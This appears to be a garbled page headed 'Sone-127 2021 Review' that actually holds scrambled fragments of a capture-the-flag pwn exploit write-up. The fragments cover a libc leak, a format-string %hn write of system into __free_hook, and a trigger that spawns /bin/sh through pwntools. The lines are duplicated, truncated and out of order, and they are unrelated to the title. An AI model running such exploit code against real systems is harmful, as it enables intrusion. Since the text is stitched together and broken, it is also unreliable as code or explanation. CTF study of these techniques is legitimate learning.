Sone-127 2021 Review

low = free_hook & 0xffff high = (free_hook >> 16) & 0xffff diff = (high - low) % 0x10000

def get_shell(io): # Upload a file containing /bin/sh io.sendlineafter(b'> ', b'upload sh.txt') io.sendlineafter(b'Enter size: ', b'8') io.send(b'/bin/sh') io.recvuntil(b'> ') SONE-127 2021

# 1️⃣ Leak libc libc_base = leak_libc(io) low = free_hook & 0xffff high = (free_hook

%addr_lowc%8$hn%addr_highc%9$hn Because the target address ( __free_hook ) is 8‑byte aligned, we split it into two 2‑byte halves and write with %hn (write 2 bytes). b'upload sh.txt') io.sendlineafter(b'Enter size: '

# Trigger free -> system io.sendlineafter(b'> ', b'download sh.txt') io.interactive()

> echo %p %p %p %p %p 0x7ffd2a8e2c30 0x0 0x7f5c1a2b2e30 0x0 0x7ffd2a8e2c30 That means the printf in the source is something like:

def write_free_hook(io, libc_base): system_addr = libc_base + libc.sym['system'] free_hook = libc_base + libc.sym['__free_hook'] log.info(f'system: hex(system_addr)') log.info(f'__free_hook: hex(free_hook)')